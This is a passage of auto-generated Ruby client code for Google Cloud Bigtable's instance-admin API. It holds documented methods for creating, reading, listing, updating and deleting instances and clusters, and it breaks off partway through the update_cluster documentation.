@quota_project_id ||= credentials.quota_project_id if credentials.respond_to? :quota_project_id
@operations_client = Operations.new do |config|
config.credentials = credentials
config.quota_project = @quota_project_id
config.endpoint = @config.endpoint
end
@bigtable_instance_admin_stub = ::Gapic::ServiceStub.new(
::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Stub,
credentials: credentials,
endpoint: @config.endpoint,
channel_args: @config.channel_args,
interceptors: @config.interceptors
)
end
##
# Get the associated client for long-running operations.
#
# @return [::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Operations]
#
attr_reader :operations_client
# Service calls
##
# Create an instance within a project.
#
# Note that exactly one of Cluster.serve_nodes and
# Cluster.cluster_config.cluster_autoscaling_config can be set. If
# serve_nodes is set to non-zero, then the cluster is manually scaled. If
# cluster_config.cluster_autoscaling_config is non-empty, then autoscaling is
# enabled.
#
# @overload create_instance(request, options = nil)
# Pass arguments to `create_instance` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::CreateInstanceRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::CreateInstanceRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload create_instance(parent: nil, instance_id: nil, instance: nil, clusters: nil)
# Pass arguments to `create_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The unique name of the project in which to create the new instance.
# Values are of the form `projects/{project}`.
# @param instance_id [::String]
# Required. The ID to be used when referring to the new instance within its project,
# e.g., just `myinstance` rather than
# `projects/myproject/instances/myinstance`.
# @param instance [::Google::Cloud::Bigtable::Admin::V2::Instance, ::Hash]
# Required. The instance to create.
# Fields marked `OutputOnly` must be left blank.
# @param clusters [::Hash{::String => ::Google::Cloud::Bigtable::Admin::V2::Cluster, ::Hash}]
# Required. The clusters to be created within the instance, mapped by desired
# cluster ID, e.g., just `mycluster` rather than
# `projects/myproject/instances/myinstance/clusters/mycluster`.
# Fields marked `OutputOnly` must be left blank.
# Currently, at most four clusters can be specified.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::CreateInstanceRequest.new
#
# # Call the create_instance method.
# result = client.create_instance request
#
# # The returned object is of type Gapic::Operation. You can use this
# # object to check the status of an operation, cancel it, or wait
# # for results. Here is how to block until completion:
# result.wait_until_done! timeout: 60
# if result.response?
# p result.response
# else
# puts "Error!"
# end
#
def create_instance request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::CreateInstanceRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.create_instance.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.parent
header_params["parent"] = request.parent
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.create_instance.timeout,
metadata: metadata,
retry_policy: @config.rpcs.create_instance.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :create_instance, request, options: options do |response, operation|
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Gets information about an instance.
#
# @overload get_instance(request, options = nil)
# Pass arguments to `get_instance` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::GetInstanceRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::GetInstanceRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload get_instance(name: nil)
# Pass arguments to `get_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. The unique name of the requested instance. Values are of the form
# `projects/{project}/instances/{instance}`.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Cloud::Bigtable::Admin::V2::Instance]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Cloud::Bigtable::Admin::V2::Instance]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::GetInstanceRequest.new
#
# # Call the get_instance method.
# result = client.get_instance request
#
# # The returned object is of type Google::Cloud::Bigtable::Admin::V2::Instance.
# p result
#
def get_instance request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::GetInstanceRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.get_instance.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.get_instance.timeout,
metadata: metadata,
retry_policy: @config.rpcs.get_instance.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :get_instance, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Lists information about instances in a project.
#
# @overload list_instances(request, options = nil)
# Pass arguments to `list_instances` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::ListInstancesRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::ListInstancesRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload list_instances(parent: nil, page_token: nil)
# Pass arguments to `list_instances` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The unique name of the project for which a list of instances is requested.
# Values are of the form `projects/{project}`.
# @param page_token [::String]
# DEPRECATED: This field is unused and ignored.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Cloud::Bigtable::Admin::V2::ListInstancesResponse]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Cloud::Bigtable::Admin::V2::ListInstancesResponse]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::ListInstancesRequest.new
#
# # Call the list_instances method.
# result = client.list_instances request
#
# # The returned object is of type Google::Cloud::Bigtable::Admin::V2::ListInstancesResponse.
# p result
#
def list_instances request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::ListInstancesRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.list_instances.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.parent
header_params["parent"] = request.parent
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.list_instances.timeout,
metadata: metadata,
retry_policy: @config.rpcs.list_instances.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :list_instances, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Updates an instance within a project. This method updates only the display
# name and type for an Instance. To update other Instance properties, such as
# labels, use PartialUpdateInstance.
#
# @overload update_instance(request, options = nil)
# Pass arguments to `update_instance` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::Instance} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::Instance, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload update_instance(name: nil, display_name: nil, state: nil, type: nil, labels: nil)
# Pass arguments to `update_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# The unique name of the instance. Values are of the form
# `projects/{project}/instances/[a-z][a-z0-9\\-]+[a-z0-9]`.
# @param display_name [::String]
# Required. The descriptive name for this instance as it appears in UIs.
# Can be changed at any time, but should be kept globally unique
# to avoid confusion.
# @param state [::Google::Cloud::Bigtable::Admin::V2::Instance::State]
# (`OutputOnly`)
# The current state of the instance.
# @param type [::Google::Cloud::Bigtable::Admin::V2::Instance::Type]
# The type of the instance. Defaults to `PRODUCTION`.
# @param labels [::Hash{::String => ::String}]
# Labels are a flexible and lightweight mechanism for organizing cloud
# resources into groups that reflect a customer's organizational needs and
# deployment strategies. They can be used to filter resources and aggregate
# metrics.
#
# * Label keys must be between 1 and 63 characters long and must conform to
# the regular expression: `[\p{Ll}\p{Lo}][\p{Ll}\p{Lo}\p{N}_-]{0,62}`.
# * Label values must be between 0 and 63 characters long and must conform to
# the regular expression: `[\p{Ll}\p{Lo}\p{N}_-]{0,63}`.
# * No more than 64 labels can be associated with a given resource.
# * Keys and values must both be under 128 bytes.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Cloud::Bigtable::Admin::V2::Instance]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Cloud::Bigtable::Admin::V2::Instance]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::Instance.new
#
# # Call the update_instance method.
# result = client.update_instance request
#
# # The returned object is of type Google::Cloud::Bigtable::Admin::V2::Instance.
# p result
#
def update_instance request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::Instance
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.update_instance.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.update_instance.timeout,
metadata: metadata,
retry_policy: @config.rpcs.update_instance.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :update_instance, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Partially updates an instance within a project. This method can modify all
# fields of an Instance and is the preferred way to update an Instance.
#
# @overload partial_update_instance(request, options = nil)
# Pass arguments to `partial_update_instance` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::PartialUpdateInstanceRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::PartialUpdateInstanceRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload partial_update_instance(instance: nil, update_mask: nil)
# Pass arguments to `partial_update_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param instance [::Google::Cloud::Bigtable::Admin::V2::Instance, ::Hash]
# Required. The Instance which will (partially) replace the current value.
# @param update_mask [::Google::Protobuf::FieldMask, ::Hash]
# Required. The subset of Instance fields which should be replaced.
# Must be explicitly set.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::PartialUpdateInstanceRequest.new
#
# # Call the partial_update_instance method.
# result = client.partial_update_instance request
#
# # The returned object is of type Gapic::Operation. You can use this
# # object to check the status of an operation, cancel it, or wait
# # for results. Here is how to block until completion:
# result.wait_until_done! timeout: 60
# if result.response?
# p result.response
# else
# puts "Error!"
# end
#
def partial_update_instance request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::PartialUpdateInstanceRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.partial_update_instance.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.instance&.name
header_params["instance.name"] = request.instance.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.partial_update_instance.timeout,
metadata: metadata,
retry_policy: @config.rpcs.partial_update_instance.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :partial_update_instance, request, options: options do |response, operation|
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Delete an instance from a project.
#
# @overload delete_instance(request, options = nil)
# Pass arguments to `delete_instance` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::DeleteInstanceRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::DeleteInstanceRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload delete_instance(name: nil)
# Pass arguments to `delete_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. The unique name of the instance to be deleted.
# Values are of the form `projects/{project}/instances/{instance}`.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Protobuf::Empty]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Protobuf::Empty]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::DeleteInstanceRequest.new
#
# # Call the delete_instance method.
# result = client.delete_instance request
#
# # The returned object is of type Google::Protobuf::Empty.
# p result
#
def delete_instance request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::DeleteInstanceRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.delete_instance.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.delete_instance.timeout,
metadata: metadata,
retry_policy: @config.rpcs.delete_instance.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :delete_instance, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Creates a cluster within an instance.
#
# Note that exactly one of Cluster.serve_nodes and
# Cluster.cluster_config.cluster_autoscaling_config can be set. If
# serve_nodes is set to non-zero, then the cluster is manually scaled. If
# cluster_config.cluster_autoscaling_config is non-empty, then autoscaling is
# enabled.
#
# @overload create_cluster(request, options = nil)
# Pass arguments to `create_cluster` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::CreateClusterRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::CreateClusterRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload create_cluster(parent: nil, cluster_id: nil, cluster: nil)
# Pass arguments to `create_cluster` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The unique name of the instance in which to create the new cluster.
# Values are of the form
# `projects/{project}/instances/{instance}`.
# @param cluster_id [::String]
# Required. The ID to be used when referring to the new cluster within its instance,
# e.g., just `mycluster` rather than
# `projects/myproject/instances/myinstance/clusters/mycluster`.
# @param cluster [::Google::Cloud::Bigtable::Admin::V2::Cluster, ::Hash]
# Required. The cluster to be created.
# Fields marked `OutputOnly` must be left blank.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::CreateClusterRequest.new
#
# # Call the create_cluster method.
# result = client.create_cluster request
#
# # The returned object is of type Gapic::Operation. You can use this
# # object to check the status of an operation, cancel it, or wait
# # for results. Here is how to block until completion:
# result.wait_until_done! timeout: 60
# if result.response?
# p result.response
# else
# puts "Error!"
# end
#
def create_cluster request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::CreateClusterRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.create_cluster.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.parent
header_params["parent"] = request.parent
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.create_cluster.timeout,
metadata: metadata,
retry_policy: @config.rpcs.create_cluster.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :create_cluster, request, options: options do |response, operation|
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Gets information about a cluster.
#
# @overload get_cluster(request, options = nil)
# Pass arguments to `get_cluster` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::GetClusterRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::GetClusterRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload get_cluster(name: nil)
# Pass arguments to `get_cluster` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. The unique name of the requested cluster. Values are of the form
# `projects/{project}/instances/{instance}/clusters/{cluster}`.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Cloud::Bigtable::Admin::V2::Cluster]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Cloud::Bigtable::Admin::V2::Cluster]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::GetClusterRequest.new
#
# # Call the get_cluster method.
# result = client.get_cluster request
#
# # The returned object is of type Google::Cloud::Bigtable::Admin::V2::Cluster.
# p result
#
def get_cluster request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::GetClusterRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.get_cluster.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.get_cluster.timeout,
metadata: metadata,
retry_policy: @config.rpcs.get_cluster.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :get_cluster, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Lists information about clusters in an instance.
#
# @overload list_clusters(request, options = nil)
# Pass arguments to `list_clusters` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::ListClustersRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::ListClustersRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload list_clusters(parent: nil, page_token: nil)
# Pass arguments to `list_clusters` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The unique name of the instance for which a list of clusters is requested.
# Values are of the form `projects/{project}/instances/{instance}`.
# Use `{instance} = '-'` to list Clusters for all Instances in a project,
# e.g., `projects/myproject/instances/-`.
# @param page_token [::String]
# DEPRECATED: This field is unused and ignored.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Cloud::Bigtable::Admin::V2::ListClustersResponse]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Cloud::Bigtable::Admin::V2::ListClustersResponse]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::ListClustersRequest.new
#
# # Call the list_clusters method.
# result = client.list_clusters request
#
# # The returned object is of type Google::Cloud::Bigtable::Admin::V2::ListClustersResponse.
# p result
#
def list_clusters request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::ListClustersRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.list_clusters.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.parent
header_params["parent"] = request.parent
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.list_clusters.timeout,
metadata: metadata,
retry_policy: @config.rpcs.list_clusters.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :list_clusters, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Updates a cluster within an instance.
#
# Note that UpdateCluster does not support updating
# cluster_config.cluster_autoscaling_config. In order to update it, you
# must use PartialUpdateCluster.
#
# @overload update_cluster(request, options = nil)
# Pass arguments to `update_cluster` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::Cluster} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::Cluster, ::Hash]
